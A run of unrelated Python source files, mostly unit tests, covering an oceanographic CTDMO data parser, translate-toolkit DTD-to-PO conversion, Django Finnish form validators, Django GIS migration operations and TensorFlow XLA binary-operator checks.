Cg_stc_eng_stc Parser unit test suite
"""
def setUp(self):
ParserUnitTestCase.setUp(self)
self._telemetered_config = {
DataSetDriverConfigKeys.PARTICLE_MODULE:
'mi.dataset.parser.ctdmo_ghqr_imodem',
DataSetDriverConfigKeys.PARTICLE_CLASS: None,
DataSetDriverConfigKeys.PARTICLE_CLASSES_DICT: {
CtdmoGhqrImodemParticleClassKey.METADATA_PARTICLE_CLASS:
CtdmoGhqrImodemMetadataTelemeteredDataParticle,
CtdmoGhqrImodemParticleClassKey.INSTRUMENT_PARTICLE_CLASS:
CtdmoGhqrImodemInstrumentTelemeteredDataParticle,
}
}
self._recovered_config = {
DataSetDriverConfigKeys.PARTICLE_MODULE:
'mi.dataset.parser.ctdmo_ghqr_imodem',
DataSetDriverConfigKeys.PARTICLE_CLASS: None,
DataSetDriverConfigKeys.PARTICLE_CLASSES_DICT: {
CtdmoGhqrImodemParticleClassKey.METADATA_PARTICLE_CLASS:
CtdmoGhqrImodemMetadataRecoveredDataParticle,
CtdmoGhqrImodemParticleClassKey.INSTRUMENT_PARTICLE_CLASS:
CtdmoGhqrImodemInstrumentRecoveredDataParticle,
}
}
def test_happy_path(self):
"""
Read files and verify that all expected particles can be read.
Verify that the contents of the particles are correct.
There should be no exceptions generated.
"""
log.debug('===== START TEST HAPPY PATH =====')
with open(os.path.join(RESOURCE_PATH, 'ctdmo01_20140712_120719.DAT'), 'r') as file_handle:
parser = CtdmoGhqrImodemParser(self._telemetered_config, file_handle, self.exception_callback)
particles = parser.get_records(1000)
self.assertEqual(self.exception_callback_value, [])
self.particle_to_yml(particles, 'ctdmo01_20140712_120719_telem.yml')
self.assert_particles(particles, "ctdmo01_20140712_120719_telem.yml", RESOURCE_PATH)
with open(os.path.join(RESOURCE_PATH, 'ctdmo01_20140712_120719.DAT'), 'r') as file_handle:
parser = CtdmoGhqrImodemParser(self._recovered_config, file_handle, self.exception_callback)
particles = parser.get_records(1000)
self.assertEqual(self.exception_callback_value, [])
self.particle_to_yml(particles, 'ctdmo01_20140712_120719_recov.yml')
self.assert_particles(particles, "ctdmo01_20140712_120719_recov.yml", RESOURCE_PATH)
self.assertEqual(self.exception_callback_value, [])
log.debug('===== END TEST HAPPY PATH =====')
def test_bad_config(self):
"""
The test ensures that a ConfigurationException is raised when providing the
parser invalid configuration
"""
log.debug('===== START TEST BAD CONFIG =====')
with self.assertRaises(ConfigurationException):
with open(os.path.join(RESOURCE_PATH, 'ctdmo01_20140712_120719.DAT'), 'r') as file_handle:
config = {
DataSetDriverConfigKeys.PARTICLE_MODULE: 'mi.dataset.parser.ctdmo_ghqr_imodem',
DataSetDriverConfigKeys.PARTICLE_CLASS: None,
DataSetDriverConfigKeys.PARTICLE_CLASSES_DICT: None
}
CtdmoGhqrImodemParser(config, file_handle, self.exception_callback)
log.debug('===== END TEST BAD CONFIG =====')
def test_unexpected_data(self):
"""
This test verifies that an unexpected data exception is reported when unexpected data
is found.
"""
log.debug('===== START TEST UNEXPECTED DATA =====')
with open(os.path.join(RESOURCE_PATH, 'unexpected_data.DAT'), 'r') as file_handle:
parser = CtdmoGhqrImodemParser(self._telemetered_config, file_handle, self.exception_callback)
parser.get_records(1)
self.assertEqual(len(self.exception_callback_value), 2)
for exception in self.exception_callback_value:
self.assertIsInstance(exception, UnexpectedDataException)
log.debug('===== END TEST UNEXPECTED DATA =====')
def test_no_particles(self):
"""
Verify that no particles are produced if the input file
has no instrument records.
"""
log.debug('===== START TEST NO PARTICLES =====')
log.debug('===== END TEST NO PARTICLES =====')
def particle_to_yml(self, particles, filename, mode='w'):
"""
This is added as a testing helper, not actually as part of the parser tests. Since the same particles
will be used for the driver test it is helpful to write them to .yml in the same form they need in the
results.yml fids here.
"""
# open write append, if you want to start from scratch manually delete this fid
fid = open(os.path.join(RESOURCE_PATH, filename), mode)
fid.write('header:\n')
fid.write(" particle_object: 'MULTIPLE'\n")
fid.write(" particle_type: 'MULTIPLE'\n")
fid.write('data:\n')
for i in range(0, len(particles)):
particle_dict = particles[i].generate_dict()
fid.write(' - _index: %d\n' % (i+1))
fid.write(' particle_object: %s\n' % particles[i].__class__.__name__)
fid.write(' particle_type: %s\n' % particle_dict.get('stream_name'))
fid.write(' internal_timestamp: %f\n' % particle_dict.get('internal_timestamp'))
for val in particle_dict.get('values'):
if isinstance(val.get('value'), float):
fid.write(' %s: %16.5f\n' % (val.get('value_id'), val.get('value')))
elif isinstance(val.get('value'), str):
fid.write(" %s: '%s'\n" % (val.get('value_id'), val.get('value')))
elif val.get('value') is None:
fid.write(" %s: !!null\n" % (val.get('value_id')))
else:
fid.write(' %s: %s\n' % (val.get('value_id'), val.get('value')))
fid.close()
|
from translate.convert import dtd2po
from translate.convert import test_convert
from translate.misc import wStringIO
from translate.storage import po
from translate.storage import dtd
class TestDTD2PO:
def dtd2po(self, dtdsource, dtdtemplate=None):
"""helper that converts dtd source to po source without requiring files"""
inputfile = wStringIO.StringIO(dtdsource)
inputdtd = dtd.dtdfile(inputfile)
convertor = dtd2po.dtd2po()
if dtdtemplate is None:
outputpo = convertor.convertstore(inputdtd)
else:
templatefile = wStringIO.StringIO(dtdtemplate)
templatedtd = dtd.dtdfile(templatefile)
outputpo = convertor.mergestore(templatedtd, inputdtd)
return outputpo
def convertdtd(self, dtdsource):
"""call the convertdtd, return the outputfile"""
inputfile = wStringIO.StringIO(dtdsource)
outputfile = wStringIO.StringIO()
templatefile = None
assert dtd2po.convertdtd(inputfile, outputfile, templatefile)
return outputfile.getvalue()
def singleelement(self, pofile):
"""checks that the pofile contains a single non-header element, and returns it"""
assert len(pofile.units) == 2
assert pofile.units[0].isheader()
print pofile.units[1]
return pofile.units[1]
def countelements(self, pofile):
"""returns the number of non-header items"""
if pofile.units[0].isheader():
return len(pofile.units) - 1
else:
return len(pofile.units)
def test_simpleentity(self):
"""checks that a simple dtd entity definition converts properly to a po entry"""
dtdsource = '<!ENTITY test.me "bananas for sale">\n'
pofile = self.dtd2po(dtdsource)
pounit = self.singleelement(pofile)
assert pounit.source == "bananas for sale"
assert pounit.target == ""
# Now with a template language
dtdtemplate = '<!ENTITY test.me "bananas for sale">\n'
dtdtranslated = '<!ENTITY test.me "piesangs te koop">\n'
pofile = self.dtd2po(dtdtranslated, dtdtemplate)
pounit = self.singleelement(pofile)
assert pounit.source == "bananas for sale"
assert pounit.target == "piesangs te koop"
def test_convertdtd(self):
"""checks that the convertdtd function is working"""
dtdsource = '<!ENTITY saveas.label "Save As...">\n'
posource = self.convertdtd(dtdsource)
pofile = po.pofile(wStringIO.StringIO(posource))
unit = self.singleelement(pofile)
assert unit.source == "Save As..."
assert unit.target == ""
def test_apos(self):
"""apostrophe should not break a single-quoted entity definition, bug 69"""
dtdsource = "<!ENTITY test.me 'bananas ' for sale'>\n"
pofile = self.dtd2po(dtdsource)
pounit = self.singleelement(pofile)
assert pounit.source == "bananas ' for sale"
def test_quotes(self):
"""quotes should be handled in a single-quoted entity definition"""
dtdsource = """<!ENTITY test.metoo '"Bananas" for sale'>\n"""
pofile = self.dtd2po(dtdsource)
pounit = self.singleelement(pofile)
print str(pounit)
assert pounit.source == '"Bananas" for sale'
def test_emptyentity(self):
"""checks that empty entity definitions survive into po file, bug 15"""
dtdsource = '<!ENTITY credit.translation "">\n'
pofile = self.dtd2po(dtdsource)
pounit = self.singleelement(pofile)
assert "credit.translation" in str(pounit)
assert 'msgctxt "credit.translation"' in str(pounit)
def test_emptyentity_translated(self):
"""checks that if we translate an empty entity it makes it into the PO, bug 101"""
dtdtemplate = '<!ENTITY credit.translation "">\n'
dtdsource = '<!ENTITY credit.translation "Translators Names">\n'
pofile = self.dtd2po(dtdsource, dtdtemplate)
unit = self.singleelement(pofile)
print unit
assert "credit.translation" in str(unit)
# We don't want this to simply be seen as a header:
assert len(unit.getid()) != 0
assert unit.target == "Translators Names"
def test_localisaton_note_simple(self):
"""test the simple localisation more becomes a #. comment"""
dtdsource = '''<!-- LOCALIZATION NOTE (alwaysCheckDefault.height):
There's some sort of bug which makes wrapping checkboxes not properly reflow,
causing the bottom border of the groupbox to be cut off; set this
appropriately if your localization causes this checkbox to wrap.
-->
<!ENTITY alwaysCheckDefault.height "3em">
'''
pofile = self.dtd2po(dtdsource)
posource = str(pofile)
print posource
assert posource.count('#.') == 5 # 1 Header extracted from, 3 comment lines, 1 autoinserted comment
def test_localisation_note_merge(self):
"""test that LOCALIZATION NOTES are added properly as #. comments and disambiguated with msgctxt entries"""
dtdtemplate = '<!--LOCALIZATION NOTE (%s): Some note -->\n' + \
'<!ENTITY %s "Source text">\n'
dtdsource = dtdtemplate % ("note1.label", "note1.label") + dtdtemplate % ("note2.label", "note2.label")
pofile = self.dtd2po(dtdsource)
posource = str(pofile.units[1]) + str(pofile.units[2])
print posource
assert posource.count('#.') == 2
assert posource.count('msgctxt') == 2
def test_donttranslate_simple(self):
"""check that we handle DONT_TRANSLATE messages properly"""
dtdsource = '''<!-- LOCALIZATION NOTE (region.Altitude): DONT_TRANSLATE -->
<!ENTITY region.Altitude "Very High">'''
pofile = self.dtd2po(dtdsource)
assert self.countelements(pofile) == 0
dtdsource = '''<!-- LOCALIZATION NOTE (exampleOpenTag.label): DONT_TRANSLATE: they are text for HTML tagnames: "<i>" and "</i>" -->
<!ENTITY exampleOpenTag.label "<i>">'''
pofile = self.dtd2po(dtdsource)
assert self.countelements(pofile) == 0
dtdsource = '''<!-- LOCALIZATION NOTE (imapAdvanced.label): Do not translate "IMAP" -->
<!ENTITY imapAdvanced.label "Advanced IMAP Server Settings">'''
pofile = self.dtd2po(dtdsource)
assert self.countelements(pofile) == 1
def test_donttranslate_label(self):
"""test strangeness when label entity is marked DONT_TRANSLATE and accesskey is not, bug 30"""
dtdsource = '<!--LOCALIZATION NOTE (editorCheck.label): DONT_TRANSLATE -->\n' + \
'<!ENTITY editorCheck.label "Composer">\n<!ENTITY editorCheck.accesskey "c">\n'
pofile = self.dtd2po(dtdsource)
posource = str(pofile)
# we need to decided what we're going to do here - see the comments in bug 30
# this tests the current implementation which is that the DONT_TRANSLATE string is removed, but the other remains
assert 'editorCheck.label' not in posource
assert 'editorCheck.accesskey' in posource
def test_donttranslate_onlyentity(self):
"""if the entity is itself just another entity then it shouldn't appear in the output PO file"""
dtdsource = '''<!-- LOCALIZATION NOTE (mainWindow.title): DONT_TRANSLATE -->
<!ENTITY mainWindow.title "&brandFullName;">'''
pofile = self.dtd2po(dtdsource)
assert self.countelements(pofile) == 0
def test_donttranslate_commentedout(self):
"""check that we don't process messages in <!-- comments -->: bug 102"""
dtdsource = '''<!-- commenting out until bug 38906 is fixed
<!ENTITY messagesHeader.label "Messages"> -->'''
pofile = self.dtd2po(dtdsource)
assert self.countelements(pofile) == 0
def test_spaces_at_start_of_dtd_lines(self):
"""test that pretty print spaces at the start of subsequent DTD element lines are removed from the PO file, bug 79"""
# Space at the end of the line
dtdsource = '<!ENTITY noupdatesfound.intro "First line then \n' + \
' next lines.">\n'
pofile = self.dtd2po(dtdsource)
pounit = self.singleelement(pofile)
# We still need to decide how we handle line line breaks in the DTD entities. It seems that we should actually
# drop the line break but this has not been implemented yet.
assert pounit.source == "First line then \nnext lines."
# No space at the end of the line
dtdsource = '<!ENTITY noupdatesfound.intro "First line then\n' + \
' next lines.">\n'
pofile = self.dtd2po(dtdsource)
pounit = self.singleelement(pofile)
assert pounit.source == "First line then \nnext lines."
def test_accesskeys_folding(self):
"""test that we fold accesskeys into message strings"""
dtdsource_template = '<!ENTITY fileSaveAs.%s "Save As...">\n<!ENTITY fileSaveAs.%s "S">\n'
lang_template = '<!ENTITY fileSaveAs.%s "Gcina ka...">\n<!ENTITY fileSaveAs.%s "G">\n'
for label in ("label", "title"):
for accesskey in ("accesskey", "accessKey", "akey"):
pofile = self.dtd2po(dtdsource_template % (label, accesskey))
pounit = self.singleelement(pofile)
assert pounit.source == "&Save As..."
# Test with template (bug 155)
pofile = self.dtd2po(lang_template % (label, accesskey), dtdsource_template % (label, accesskey))
pounit = self.singleelement(pofile)
assert pounit.source == "&Save As..."
assert pounit.target == "&Gcina ka..."
def test_accesskeys_mismatch(self):
"""check that we can handle accesskeys that don't match and thus can't be folded into the .label entry"""
dtdsource = '<!ENTITY fileSave.label "Save">\n' + \
'<!ENTITY fileSave.accesskey "z">\n'
pofile = self.dtd2po(dtdsource)
assert self.countelements(pofile) == 2
def test_carriage_return_in_multiline_dtd(self):
"""test that we create nice PO files when we find a \r\n in a multiline DTD element"""
dtdsource = '<!ENTITY noupdatesfound.intro "First line then \r\n' + \
' next lines.">\n'
pofile = self.dtd2po(dtdsource)
unit = self.singleelement(pofile)
assert unit.source == "First line then \nnext lines."
def test_multiline_with_blankline(self):
"""test that we can process a multiline entity that has a blank line in it, bug 331"""
dtdsource = '''
<!ENTITY multiline.text "
Some text
Some other text
">'''
pofile = self.dtd2po(dtdsource)
unit = self.singleelement(pofile)
assert unit.source == "Some text \n \nSome other text"
def test_mulitline_closing_quotes(self):
"""test that we support various styles and spaces after closing quotes on multiline entities"""
dtdsource = '''
<!ENTITY pref.plural '<span>opsies</span><span
class="noWin">preferences</span>' >
'''
pofile = self.dtd2po(dtdsource)
unit = self.singleelement(pofile)
assert unit.source == '<span>opsies</span><span \nclass="noWin">preferences</span>'
def test_preserving_spaces(self):
"""test that we preserve space that appear at the start of the first line of a DTD entity"""
# Space before first character
dtdsource = '<!ENTITY mainWindow.titlemodifiermenuseparator " - ">'
pofile = self.dtd2po(dtdsource)
unit = self.singleelement(pofile)
assert unit.source == " - "
# Double line and spaces
dtdsource = '<!ENTITY mainWindow.titlemodifiermenuseparator " - with a newline\n and more text">'
pofile = self.dtd2po(dtdsource)
unit = self.singleelement(pofile)
print repr(unit.source)
assert unit.source == " - with a newline \nand more text"
def test_escaping_newline_tabs(self):
"""test that we handle all kinds of newline permutations"""
dtdsource = '<!ENTITY noupdatesfound.intro "A hard coded newline.\\nAnd tab\\t and a \\r carriage return.">\n'
converter = dtd2po.dtd2po()
thedtd = dtd.dtdunit()
thedtd.parse(dtdsource)
thepo = po.pounit()
converter.convertstrings(thedtd, thepo)
print thedtd
print thepo.source
# \n in a dtd should also appear as \n in the PO file
assert thepo.source == r"A hard coded newline.\nAnd tab\t and a \r carriage return."
def test_abandoned_accelerator(self):
"""test that when a language DTD has an accelerator but the template DTD does not that we abandon the accelerator"""
dtdtemplate = '<!ENTITY test.label "Test">\n'
dtdlanguage = '<!ENTITY test.label "Toets">\n<!ENTITY test.accesskey "T">\n'
pofile = self.dtd2po(dtdlanguage, dtdtemplate)
unit = self.singleelement(pofile)
assert unit.source == "Test"
assert unit.target == "Toets"
def test_unassociable_accelerator(self):
"""test to see that we can handle accelerator keys that cannot be associated correctly"""
dtdsource = '<!ENTITY managecerts.button "Manage Certificates...">\n<!ENTITY managecerts.accesskey "M">'
pofile = self.dtd2po(dtdsource)
assert pofile.units[1].source == "Manage Certificates..."
assert pofile.units[2].source == "M"
pofile = self.dtd2po(dtdsource, dtdsource)
assert pofile.units[1].target == "Manage Certificates..."
assert pofile.units[2].target == "M"
def test_changed_labels_and_accelerators(self):
"""test to ensure that when the template changes an entity name we can still manage the accelerators"""
dtdtemplate = '''<!ENTITY managecerts.caption "Manage Certificates">
<!ENTITY managecerts.text "Use the Certificate Manager to manage your personal certificates, as well as those of other people and certificate authorities.">
<!ENTITY managecerts.button "Manage Certificates...">
<!ENTITY managecerts.accesskey "M">'''
dtdlanguage = '''<!ENTITY managecerts.label "ﺇﺩﺍﺭﺓ ﺎﻠﺸﻫﺍﺩﺎﺗ">
<!ENTITY managecerts.text "ﺎﺴﺘﺧﺪﻣ ﻡﺪﻳﺭ ﺎﻠﺸﻫﺍﺩﺎﺗ ﻹﺩﺍﺭﺓ ﺶﻫﺍﺩﺎﺘﻛ ﺎﻠﺸﺨﺼﻳﺓ، ﺏﺍﻺﺿﺎﻓﺓ ﻞﺘﻠﻛ ﺎﻠﺧﺎﺻﺓ ﺏﺍﻶﺧﺮﻴﻧ ﻭ ﺲﻠﻃﺎﺗ ﺎﻠﺸﻫﺍﺩﺎﺗ.">
<!ENTITY managecerts.button "ﺇﺩﺍﺭﺓ ﺎﻠﺸﻫﺍﺩﺎﺗ...">
<!ENTITY managecerts.accesskey "ﺩ">'''
pofile = self.dtd2po(dtdlanguage, dtdtemplate)
print pofile
assert pofile.units[3].source == "Manage Certificates..."
assert pofile.units[3].target == u"ﺇﺩﺍﺭﺓ ﺎﻠﺸﻫﺍﺩﺎﺗ..."
assert pofile.units[4].source == "M"
assert pofile.units[4].target == u"ﺩ"
def wtest_accelerator_keys_not_in_sentence(self):
"""tests to ensure that we can manage accelerator keys that are not part of the transated sentence eg in Chinese"""
dtdtemplate = '''<!ENTITY useAutoScroll.label "Use autoscrolling">
<!ENTITY useAutoScroll.accesskey "a">'''
dtdlanguage = '''<!ENTITY useAutoScroll.label "使用自動捲動(Autoscrolling)">
<!ENTITY useAutoScroll.accesskey "a">'''
pofile = self.dtd2po(dtdlanguage, dtdtemplate)
print pofile
assert pofile.units[1].target == "使用自動捲動(&Autoscrolling)"
# We assume that accesskeys with no associated key should be done as follows "XXXX (&A)"
# TODO - check that we can unfold this from PO -> DTD
dtdlanguage = '''<!ENTITY useAutoScroll.label "使用自動捲動">
<!ENTITY useAutoScroll.accesskey "a">'''
pofile = self.dtd2po(dtdlanguage, dtdtemplate)
print pofile
assert pofile.units[1].target == "使用自動捲動 (&A)"
def test_exclude_entity_includes(self):
"""test that we don't turn an include into a translatable string"""
dtdsource = '<!ENTITY % brandDTD SYSTEM "chrome://branding/locale/brand.dtd">'
pofile = self.dtd2po(dtdsource)
assert self.countelements(pofile) == 0
def test_linewraps(self):
"""check that redundant line wraps are removed from the po file"""
dtdsource = '''<!ENTITY generic.longDesc "
<p>Test me.</p>
">'''
pofile = self.dtd2po(dtdsource)
pounit = self.singleelement(pofile)
assert pounit.source == "<p>Test me.</p>"
def test_merging_with_new_untranslated(self):
"""test that when we merge in new untranslated strings with existing translations we manage the encodings properly"""
# This should probably be in test_po.py but was easier to do here
dtdtemplate = '''<!ENTITY unreadFolders.label "Unread">\n<!ENTITY viewPickerUnread.label "Unread">\n<!ENTITY unreadColumn.label "Unread">'''
dtdlanguage = '''<!ENTITY viewPickerUnread.label "Непрочетени">\n<!ENTITY unreadFolders.label "Непрочетени">'''
pofile = self.dtd2po(dtdlanguage, dtdtemplate)
print pofile
assert pofile.units[1].source == "Unread"
def test_merge_without_template(self):
"""test that we we manage the case where we merge and their is no template file"""
# If we supply a template file we should fail if the template file does not exist or is blank. We should
# not put the translation in as the source.
# TODO: this test fails, since line 16 checks for "not dtdtemplate"
# instead of checking for "dtdtemplate is None". What is correct?
dtdtemplate = ''
dtdsource = '<!ENTITY no.template "Target">'
pofile = self.dtd2po(dtdsource, dtdtemplate)
print pofile
assert self.countelements(pofile) == 0
class TestDTD2POCommand(test_convert.TestConvertCommand, TestDTD2PO):
"""Tests running actual dtd2po commands on files"""
convertmodule = dtd2po
defaultoptions = {"progress": "none"}
def test_help(self):
"""tests getting help"""
options = test_convert.TestConvertCommand.test_help(self)
options = self.help_check(options, "-P, --pot")
options = self.help_check(options, "-t TEMPLATE, --template=TEMPLATE")
options = self.help_check(options, "--duplicates=DUPLICATESTYLE", last=True)
|
"""
FI-specific Form helpers
"""
from __future__ import absolute_import, unicode_literals
import re
from django.core.validators import EMPTY_VALUES
from django.forms import ValidationError
from django.forms.fields import Field, RegexField, Select
from django.utils.translation import ugettext_lazy as _
from .fi_municipalities import MUNICIPALITY_CHOICES
class FIZipCodeField(RegexField):
"""
A form field that validates input as a Finnish zip code. Valid codes
consist of five digits.
"""
default_error_messages = {
'invalid': _('Enter a zip code in the format XXXXX.'),
}
def __init__(self, max_length=None, min_length=None, *args, **kwargs):
super(FIZipCodeField, self).__init__(r'^\d{5}$',
max_length, min_length, *args, **kwargs)
class FIMunicipalitySelect(Select):
"""
A Select widget that uses a list of Finnish municipalities as its choices.
"""
def __init__(self, attrs=None):
super(FIMunicipalitySelect, self).__init__(attrs, choices=MUNICIPALITY_CHOICES)
class FISocialSecurityNumber(Field):
"""A form field that validates input as a Finnish social security number."""
default_error_messages = {
'invalid': _('Enter a valid Finnish social security number.'),
}
def clean(self, value):
super(FISocialSecurityNumber, self).clean(value)
if value in EMPTY_VALUES:
return ''
checkmarks = "0123456789ABCDEFHJKLMNPRSTUVWXY"
result = re.match(r"""^
(?P<date>([0-2]\d|3[01])
(0\d|1[012])
(\d{2}))
[A+-]
(?P<serial>(\d{3}))
(?P<checksum>[%s])$""" % checkmarks, value, re.VERBOSE | re.IGNORECASE)
if not result:
raise ValidationError(self.error_messages['invalid'])
gd = result.groupdict()
checksum = int(gd['date'] + gd['serial'])
if checkmarks[checksum % len(checkmarks)] == gd['checksum'].upper():
return '%s' % value.upper()
raise ValidationError(self.error_messages['invalid'])
|
from unittest import skipUnless
from django.contrib.gis.db.models import fields
from django.contrib.gis.geos import MultiPolygon, Polygon
from django.core.exceptions import ImproperlyConfigured
from django.db import connection, migrations, models
from django.db.migrations.migration import Migration
from django.db.migrations.state import ProjectState
from django.test import (
TransactionTestCase, skipIfDBFeature, skipUnlessDBFeature,
)
try:
GeometryColumns = connection.ops.geometry_columns()
HAS_GEOMETRY_COLUMNS = True
except NotImplementedError:
HAS_GEOMETRY_COLUMNS = False
class OperationTestCase(TransactionTestCase):
available_apps = ['gis_tests.gis_migrations']
def tearDown(self):
# Delete table after testing
if hasattr(self, 'current_state'):
self.apply_operations('gis', self.current_state, [migrations.DeleteModel('Neighborhood')])
super().tearDown()
@property
def has_spatial_indexes(self):
if connection.ops.mysql:
with connection.cursor() as cursor:
return connection.introspection.supports_spatial_index(cursor, 'gis_neighborhood')
return True
def get_table_description(self, table):
with connection.cursor() as cursor:
return connection.introspection.get_table_description(cursor, table)
def assertColumnExists(self, table, column):
self.assertIn(column, [c.name for c in self.get_table_description(table)])
def assertColumnNotExists(self, table, column):
self.assertNotIn(column, [c.name for c in self.get_table_description(table)])
def apply_operations(self, app_label, project_state, operations):
migration = Migration('name', app_label)
migration.operations = operations
with connection.schema_editor() as editor:
return migration.apply(project_state, editor)
def set_up_test_model(self, force_raster_creation=False):
test_fields = [
('id', models.AutoField(primary_key=True)),
('name', models.CharField(max_length=100, unique=True)),
('geom', fields.MultiPolygonField(srid=4326))
]
if connection.features.supports_raster or force_raster_creation:
test_fields += [('rast', fields.RasterField(srid=4326, null=True))]
operations = [migrations.CreateModel('Neighborhood', test_fields)]
self.current_state = self.apply_operations('gis', ProjectState(), operations)
def assertGeometryColumnsCount(self, expected_count):
self.assertEqual(
GeometryColumns.objects.filter(**{
'%s__iexact' % GeometryColumns.table_name_col(): 'gis_neighborhood',
}).count(),
expected_count
)
def assertSpatialIndexExists(self, table, column, raster=False):
with connection.cursor() as cursor:
constraints = connection.introspection.get_constraints(cursor, table)
if raster:
self.assertTrue(any(
'st_convexhull(%s)' % column in c['definition']
for c in constraints.values()
if c['definition'] is not None
))
else:
self.assertIn([column], [c['columns'] for c in constraints.values()])
def alter_gis_model(self, migration_class, model_name, field_name,
blank=False, field_class=None, field_class_kwargs=None):
args = [model_name, field_name]
if field_class:
field_class_kwargs = field_class_kwargs or {'srid': 4326, 'blank': blank}
args.append(field_class(**field_class_kwargs))
operation = migration_class(*args)
old_state = self.current_state.clone()
operation.state_forwards('gis', self.current_state)
with connection.schema_editor() as editor:
operation.database_forwards('gis', editor, old_state, self.current_state)
class OperationTests(OperationTestCase):
def setUp(self):
super().setUp()
self.set_up_test_model()
def test_add_geom_field(self):
"""
Test the AddField operation with a geometry-enabled column.
"""
self.alter_gis_model(migrations.AddField, 'Neighborhood', 'path', False, fields.LineStringField)
self.assertColumnExists('gis_neighborhood', 'path')
# Test GeometryColumns when available
if HAS_GEOMETRY_COLUMNS:
self.assertGeometryColumnsCount(2)
# Test spatial indices when available
if self.has_spatial_indexes:
self.assertSpatialIndexExists('gis_neighborhood', 'path')
@skipUnless(HAS_GEOMETRY_COLUMNS, "Backend doesn't support GeometryColumns.")
def test_geom_col_name(self):
self.assertEqual(
GeometryColumns.geom_col_name(),
'column_name' if connection.ops.oracle else 'f_geometry_column',
)
@skipUnlessDBFeature('supports_raster')
def test_add_raster_field(self):
"""
Test the AddField operation with a raster-enabled column.
"""
self.alter_gis_model(migrations.AddField, 'Neighborhood', 'heatmap', False, fields.RasterField)
self.assertColumnExists('gis_neighborhood', 'heatmap')
# Test spatial indices when available
if self.has_spatial_indexes:
self.assertSpatialIndexExists('gis_neighborhood', 'heatmap', raster=True)
def test_add_blank_geom_field(self):
"""
Should be able to add a GeometryField with blank=True.
"""
self.alter_gis_model(migrations.AddField, 'Neighborhood', 'path', True, fields.LineStringField)
self.assertColumnExists('gis_neighborhood', 'path')
# Test GeometryColumns when available
if HAS_GEOMETRY_COLUMNS:
self.assertGeometryColumnsCount(2)
# Test spatial indices when available
if self.has_spatial_indexes:
self.assertSpatialIndexExists('gis_neighborhood', 'path')
@skipUnlessDBFeature('supports_raster')
def test_add_blank_raster_field(self):
"""
Should be able to add a RasterField with blank=True.
"""
self.alter_gis_model(migrations.AddField, 'Neighborhood', 'heatmap', True, fields.RasterField)
self.assertColumnExists('gis_neighborhood', 'heatmap')
# Test spatial indices when available
if self.has_spatial_indexes:
self.assertSpatialIndexExists('gis_neighborhood', 'heatmap', raster=True)
def test_remove_geom_field(self):
"""
Test the RemoveField operation with a geometry-enabled column.
"""
self.alter_gis_model(migrations.RemoveField, 'Neighborhood', 'geom')
self.assertColumnNotExists('gis_neighborhood', 'geom')
# Test GeometryColumns when available
if HAS_GEOMETRY_COLUMNS:
self.assertGeometryColumnsCount(0)
@skipUnlessDBFeature('supports_raster')
def test_remove_raster_field(self):
"""
Test the RemoveField operation with a raster-enabled column.
"""
self.alter_gis_model(migrations.RemoveField, 'Neighborhood', 'rast')
self.assertColumnNotExists('gis_neighborhood', 'rast')
def test_create_model_spatial_index(self):
if not self.has_spatial_indexes:
self.skipTest('No support for Spatial indexes')
self.assertSpatialIndexExists('gis_neighborhood', 'geom')
if connection.features.supports_raster:
self.assertSpatialIndexExists('gis_neighborhood', 'rast', raster=True)
@skipUnlessDBFeature('can_alter_geometry_field', 'supports_3d_storage')
def test_alter_geom_field_dim(self):
Neighborhood = self.current_state.apps.get_model('gis', 'Neighborhood')
p1 = Polygon(((0, 0), (0, 1), (1, 1), (1, 0), (0, 0)))
Neighborhood.objects.create(name='TestDim', geom=MultiPolygon(p1, p1))
# Add 3rd dimension.
self.alter_gis_model(
migrations.AlterField, 'Neighborhood', 'geom', False,
fields.MultiPolygonField, field_class_kwargs={'srid': 4326, 'dim': 3}
)
self.assertTrue(Neighborhood.objects.first().geom.hasz)
# Rewind to 2 dimensions.
self.alter_gis_model(
migrations.AlterField, 'Neighborhood', 'geom', False,
fields.MultiPolygonField, field_class_kwargs={'srid': 4326, 'dim': 2}
)
self.assertFalse(Neighborhood.objects.first().geom.hasz)
@skipIfDBFeature('supports_raster')
class NoRasterSupportTests(OperationTestCase):
def test_create_raster_model_on_db_without_raster_support(self):
msg = 'Raster fields require backends with raster support.'
with self.assertRaisesMessage(ImproperlyConfigured, msg):
self.set_up_test_model(force_raster_creation=True)
def test_add_raster_field_on_db_without_raster_support(self):
msg = 'Raster fields require backends with raster support.'
with self.assertRaisesMessage(ImproperlyConfigured, msg):
self.set_up_test_model()
self.alter_gis_model(
migrations.AddField, 'Neighborhood', 'heatmap',
False, fields.RasterField
)
|
"""Test cases for binary operators."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from tensorflow.compiler.tests.xla_test import XLATestCase
from tensorflow.python.framework import dtypes
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import gen_math_ops
from tensorflow.python.ops import gen_nn_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import nn_ops
from tensorflow.python.platform import googletest
class BinaryOpsTest(XLATestCase):
"""Test cases for binary operators."""
def _testBinary(self, op, a, b, expected, equality_test=None):
with self.test_session() as session:
with self.test_scope():
pa = array_ops.placeholder(dtypes.as_dtype(a.dtype), a.shape, name="a")
pb = array_ops.placeholder(dtypes.as_dtype(b.dtype), b.shape, name="b")
output = op(pa, pb)
result = session.run(output, {pa: a, pb: b})
if equality_test is None:
equality_test = self.assertAllClose
equality_test(result, expected, rtol=1e-3)
def ListsAreClose(self, result, expected, rtol):
"""Tests closeness of two lists of floats."""
self.assertEqual(len(result), len(expected))
for i in range(len(result)):
self.assertAllClose(result[i], expected[i], rtol)
def testFloatOps(self):
for dtype in self.float_types:
self._testBinary(
gen_math_ops._real_div,
np.array([3, 3, -1.5, -8, 44], dtype=dtype),
np.array([2, -2, 7, -4, 0], dtype=dtype),
expected=np.array(
[1.5, -1.5, -0.2142857, 2, float("inf")], dtype=dtype))
self._testBinary(math_ops.pow, dtype(3), dtype(4), expected=dtype(81))
self._testBinary(
math_ops.pow,
np.array([1, 2], dtype=dtype),
np.zeros(shape=[0, 2], dtype=dtype),
expected=np.zeros(shape=[0, 2], dtype=dtype))
self._testBinary(
math_ops.pow,
np.array([10, 4], dtype=dtype),
np.array([2, 3], dtype=dtype),
expected=np.array([100, 64], dtype=dtype))
self._testBinary(
math_ops.pow,
dtype(2),
np.array([3, 4], dtype=dtype),
expected=np.array([8, 16], dtype=dtype))
self._testBinary(
math_ops.pow,
np.array([[2], [3]], dtype=dtype),
dtype(4),
expected=np.array([[16], [81]], dtype=dtype))
self._testBinary(
gen_math_ops._sigmoid_grad,
np.array([4, 3, 2, 1], dtype=dtype),
np.array([5, 6, 7, 8], dtype=dtype),
expected=np.array([-60, -36, -14, 0], dtype=dtype))
